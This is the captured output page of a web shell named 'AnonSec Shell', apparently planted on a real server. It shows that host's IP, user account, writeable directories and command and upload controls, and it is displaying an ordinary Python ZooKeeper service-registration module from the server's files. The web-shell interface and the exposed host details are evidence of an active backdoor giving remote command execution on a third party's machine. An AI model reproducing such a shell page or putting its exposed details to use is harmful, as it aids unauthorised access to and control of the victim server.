AnonSec Shell
Server IP : 92.204.138.22  /  Your IP : 18.119.172.85
Web Server : Apache
System : Linux ns1009439.ip-92-204-138.us 4.18.0-553.8.1.el8_10.x86_64 #1 SMP Tue Jul 2 07:26:33 EDT 2024 x86_64
User : internationaljou ( 1019)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/self/root/var/opt/nydus/ops/primordial/service/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /proc/self/root/var/opt/nydus/ops/primordial/service/registration.py
# -*- coding: utf-8 -*-

from argparse import ArgumentParser
from datetime import datetime
from collections import defaultdict
from functools import partial
import json
import logging
import os
import os.path
import platform
import signal
import socket
import subprocess
from typing import Any, Callable, Dict, Iterable, List, Optional, Tuple, Union  # pylint: disable=W0611
from uuid import uuid1

from kazoo.client import KazooClient, KazooState

from primordial.constants import CANONICAL_TIMESTRING_FORMAT
from primordial.flow import retry, RetryError
from primordial.settings import (ZK_HOSTS, GD_ZKRUN_VIRTUALENV_PATH, GD_ZKRUN_COMMAND, GD_ZKRUN_NAME, GD_ZKRUN_HOSTS,
                                 GD_ZKRUN_SERVICE_TYPE, GD_ZKRUN_PORT, GD_ZKRUN_SSL_PORT, GD_ZKRUN_LOCATIONS)


SIGNALS = defaultdict(int)  # type: Dict[int, int]
# map pid to running
ZKSTART_STATUS = {}
LOGGER = logging.getLogger(__name__)


def get_zkhosts():
    """Gets the zkhosts from the default settings"""
    return ZK_HOSTS


LocationsType = Optional[Union[str, Iterable[str]]]


class ZkRegistrar:
    """Implementation of a basic Zookeeper ephemeral node registrar."""
    locations = None  # type: LocationsType

    def __init__(self,
                 listener: Optional[Callable] = None,
                 name: Optional[str] = None,
                 zkhosts: Optional[str] = None,
                 service_type: str = "registrations",
                 port: Optional[int] = None,
                 ssl_port: Optional[int] = None,
                 locations: LocationsType = None) -> None:
        """Create a zookeeper client and hang on to the listener.

        :param listener:  The zookeeper listener action; is activated by the kazoo client when updates occur to watched
                          zookeeper parameters.
        :param name: The path base for this service.
        :param zkhosts: The zkhost or hosts (list) to use with the zk client; if none set, a local function is used
                        that uses hfs best practices to find the zk host setting for the machine this is running on.
        :param service_type: verticals for REST interfaces and registrations for Kafka listeners, pollers, etc.
        :param port: port the service is listening on if any
        :param ssl_port: ssl port if any
        :param locations: URLs that correspond to this server if any
        """
        if zkhosts is None:
            zkhosts = get_zkhosts()
        if isinstance(zkhosts, (list, tuple)):
            zkhosts = ",".join(zkhosts)
        self.listener = listener or self.default_zk_state_handler
        self.name = name
        self.zk = KazooClient(hosts=zkhosts)
        self.zk_uuid = str(uuid1())
        self.service_type = service_type
        self.port = port
        self.ssl_port = ssl_port
        self.locations = locations
        self.connection_was_lost = False
        self.need_to_register = True

    def default_zk_state_handler(self, state: str) -> None:
        """A default state handler function"""
        LOGGER.debug('Zookeeper state change: %s (%s)', state, self.zk.client_state)
        # The state transition we need to handle is LOST->CONNECTED, in which
        # case we need to re-register the service in ZooKeeper.
        if state == KazooState.LOST:
            self.connection_was_lost = True
            self.need_to_register = False
        elif state == KazooState.CONNECTED and self.connection_was_lost:
            self.connection_was_lost = False
            self.need_to_register = True

    def register(self) -> None:
        """Register the listener"""
        self.zk.add_listener(self.listener)
        self.zk.start()
        if self.locations is None:
            locations = []  # type: Iterable[str]
        elif not isinstance(self.locations, (list, tuple)):
            locations = [self.locations]  # type: ignore
        else:
            locations = self.locations
        zk_register_data = {
            'address': platform.node(),
            'id': self.zk_uuid,
            'name': self.name,
            'locations': locations,
            'registrationTimeUTC': datetime.utcnow().strftime(CANONICAL_TIMESTRING_FORMAT),  # pylint: disable=E1120
            'serviceType': 'DYNAMIC'
        }  # type: Dict[str, Any]
        if self.port is not None:
            zk_register_data['port'] = self.port
        if self.ssl_port is not None:
            zk_register_data['sslPort'] = self.ssl_port
        self.zk.ensure_path('/service/%s/%s' % (self.service_type, self.name))
        self.zk.create('/service/%s/%s/%s' % (self.service_type, self.name, self.zk_uuid),
                       json.dumps(zk_register_data).encode('utf-8'), ephemeral=True)
        self.need_to_register = False

    def unregister(self) -> None:
        """Unregister the listener and stop"""
        self.zk.delete('/service/%s/%s/%s' % (self.service_type, self.name, self.zk_uuid))
        self.zk.remove_listener(self.listener)
        self.zk.stop()


def shell_run(command: str) -> subprocess.Popen:
    """A hyper simplistic shell command runner.

    Linux only.  Uses bash as /bin/bash.  NB: this does NOT change the current
    working directory of the shell or the parent process; any command you run
    will have to be on the PATH or part of the entered virtualenv, etc.

    :param command:  This is a command that will be run in a subshell, verbatim.
        The caller is fully responsible for all related security concerns.
        This function will not perform any processing on the string, e.g.no
        string substitutions, no interpolations, etc.  It will simply create a
        shell, execute the command on a single input to the shell, and then
        manage the process.  Shell metacharacters and expansions ** will ** be
        processed as per standard shell semantics.  E.g.

        .. code-block:: python

            uwsgi_exe = ("source %(virtualenv)s/bin/activate && "
                        "cd %(virtualenv)s/.. && "
                        "uwsgi --master --lazy-apps --processes 5 "
                        "--die-on-term --module wsgi:application --http :80"
                        % {'virtualenv': vpath})

    :returns:  The structure returned by subprocess.Popen:
               https://docs.python.org/3/library/subprocess.html#subprocess.Popen

    """
    return subprocess.Popen(["/bin/bash", "-c", command])  # pylint: disable=consider-using-with


def enter_virtualenv_and_run(virtualenv_path: str, command: str) -> subprocess.Popen:
    """Enter a virtual environment and run a command.

    Simplifies a common python use case of entering a virtualenv and running a
    local shell command.  NB: this does NOT change the current working directory
    of the shell or the parent process; any command you run will have to
    be on the PATH or part of the entered virtualenv.

    :param virtualenv_path: A string representing the absolute path to a virtualenv.
    :param command:  As per shell_run.
    :returns:  The structure returned by subprocess.Popen:
               https://docs.python.org/3/library/subprocess.html#subprocess.Popen
    :raises ValueError: if the virtualenv path appears to be in error.
    """
    vpath = os.path.abspath(virtualenv_path)
    if not os.path.exists(os.path.join(vpath, 'bin', 'activate')):
        raise ValueError('Specified path (%s) does not look like a python virtualenv!' % virtualenv_path)

    venv_command = ("source %(virtualenv_path)s/bin/activate && %(command)s" %
                    {'virtualenv_path': virtualenv_path, 'command': command})

    return shell_run(venv_command)


def bind_signal_handlers(signals: List[int], signal_handler_func: Callable) -> None:
    """Bind one or more signals to a signal handler.

    :param signals: A list of signals to be bound
    :param signal_handler_func: The handler to bind to the signals
    :raises ValueError: on invalid signal number
    """
    for signal_ in signals:
        signal.signal(signal_, signal_handler_func)


def default_signal_handler(signum: int, _) -> None:
    """By default, count calls to a signal.

    :param signum: The signal which was called
    """
    SIGNALS[signum] += 1


def set_default_signals() -> None:
    """Bind default signal handlers."""
    bind_signal_handlers([signal.SIGINT, signal.SIGTERM], default_signal_handler)


def wait_for_process(pid: int, sleep_secs: float, max_attempts: int) -> Tuple[int, int]:
    """Wait for a process to finish running.

    :param pid: The process ID on which to wait
    :param sleep_secs: The number of seconds to sleep between checks
    :param max_attempts: The number of times to attempt checking on the pid
    """

    def wait_for_pid(mypid):
        w_process_id, w_exit_status = os.waitpid(mypid, os.WNOHANG)
        if w_process_id == 0:
            raise Exception("Not done yet")
        return w_process_id, w_exit_status

    try:
        process_id, exit_status = retry(partial(wait_for_pid, pid), sleep_secs=sleep_secs, max_attempts=max_attempts)
    except RetryError as _:
        process_id, exit_status = None, None
    return process_id, exit_status


def check_tcp_port(port: int) -> bool:
    """Check to see if a local port is accepting TCP connections.

    :param port: The port number to be checked.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
    s.settimeout(1)
    ret = False
    try:
        s.connect(('', port))
        s.shutdown(socket.SHUT_RDWR)
        ret = True
    except socket.timeout:
        pass
    finally:
        s.close()
    return ret


def zk_start(args: Optional[List[str]] = None) -> ZkRegistrar:
    """Start a process wrapped in a watcher and register with zookeeper.

    Steps:

        1.  Get the ephemeral registration data from command-line arguments or environment variables
        2.  Get the command to run from command-line arguments or environment variables
        3.  Run the command.
        4.  If successful, register with zookeeper.
        5.  Wait for the command to complete.
        6.  De-register with zookeeper.

    Command-line arguments:

        * --virtualenv-path
        * --command
        * --name
        * --zkhosts
        * --service_type (verticals, registrations)
        * --port
        * --ssl-port
        * --locations

    Environment variables (from settings.py):

        * GD_ZKRUN_VIRTUALENV_PATH
        * GD_ZKRUN_COMMAND
        * GD_ZKRUN_NAME
        * ZK_HOSTS
        * GD_ZKRUN_HOSTS
        * GD_ZKRUN_SERVICE_TYPE
        * GD_ZKRUN_PORT
        * GD_ZKRUN_SSL_PORT
        * GD_ZKRUN_LOCATIONS

    Methodology:

        * Command-line arguments override environment variables.

    """
    parser = ArgumentParser(description="Start a process with a zookeeper registration")
    parser.add_argument('--virtualenv-path', help="Path to a python venv")
    parser.add_argument('--command', required=True, help="Shell command to run, properly escaped")
    parser.add_argument('--name', required=True, help="Service name (zk base node)")
    parser.add_argument('--zkhosts', action='append', help="Zookeeper hosts")
    parser.add_argument('--service_type', required=True, help="Service type, registrations or verticals")
    parser.add_argument('--port', type=int, help="Port of service if any")
    parser.add_argument('--ssl-port', type=int, help="Ssl port of service if any")
    parser.add_argument('--locations', action='append', help="Urls for MCP use if any")
    res = parser.parse_args(args=args)

    virtualenv_path = res.virtualenv_path or GD_ZKRUN_VIRTUALENV_PATH or None
    command = res.command or GD_ZKRUN_COMMAND or None
    name = res.name or GD_ZKRUN_NAME or None
    zkhosts = res.zkhosts or GD_ZKRUN_HOSTS or ZK_HOSTS or None
    service_type = res.service_type or GD_ZKRUN_SERVICE_TYPE or None
    port = res.port or GD_ZKRUN_PORT or None
    ssl_port = res.ssl_port or GD_ZKRUN_SSL_PORT or None
    locations = res.locations or GD_ZKRUN_LOCATIONS or None

    if virtualenv_path is not None:
        LOGGER.info("Running venv run %s { %s } { %s }", enter_virtualenv_and_run, virtualenv_path, command)
        pid = enter_virtualenv_and_run(virtualenv_path, command).pid  # type: ignore
    else:
        LOGGER.info("Running shell run %s { %s }", shell_run, command)
        pid = shell_run(command).pid  # type: ignore
    LOGGER.info("Started process %s", pid)
    ZKSTART_STATUS[pid] = True

    def zkstart_signal_handler(_signum, _frame, runpid=None):
        LOGGER.info("Signal handler called with %s, %s", _signum, _frame)
        ZKSTART_STATUS[runpid] = False

    bind_signal_handlers([signal.SIGINT, signal.SIGTERM], partial(zkstart_signal_handler, runpid=pid))

    registrar = ZkRegistrar(name=name, zkhosts=zkhosts, service_type=service_type, port=port,  # type: ignore
                            ssl_port=ssl_port, locations=locations)  # type: ignore
    registrar.register()
    while ZKSTART_STATUS[pid] is True:
        if registrar.need_to_register is True:
            registrar.register()
        process_id, exit_status = wait_for_process(pid, 5, 3)
        if process_id is not None:
            LOGGER.info('Process %s exited with status %s', pid, exit_status)
            break
    LOGGER.info("Clean shutdown of %s", pid)
    registrar.unregister()
    return registrar  # this is harmless, and handy for testing

Anon7 - 2022
AnonSec Team